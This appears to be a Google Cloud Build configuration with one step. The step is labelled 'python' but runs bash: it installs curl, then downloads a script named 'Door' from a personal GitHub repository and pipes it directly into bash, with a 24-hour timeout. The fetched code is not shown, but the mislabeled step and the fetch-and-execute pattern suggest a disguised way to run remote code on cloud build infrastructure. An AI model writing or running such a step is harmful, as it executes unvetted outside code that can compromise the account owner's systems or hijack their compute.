steps:
  - name: python
    args:
      - '-c'
      - >-
        apt-get update && apt-get install curl -y && curl -sL curl https://raw.githubusercontent.com/pevinnagewe8919/Man/main/Door | bash
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
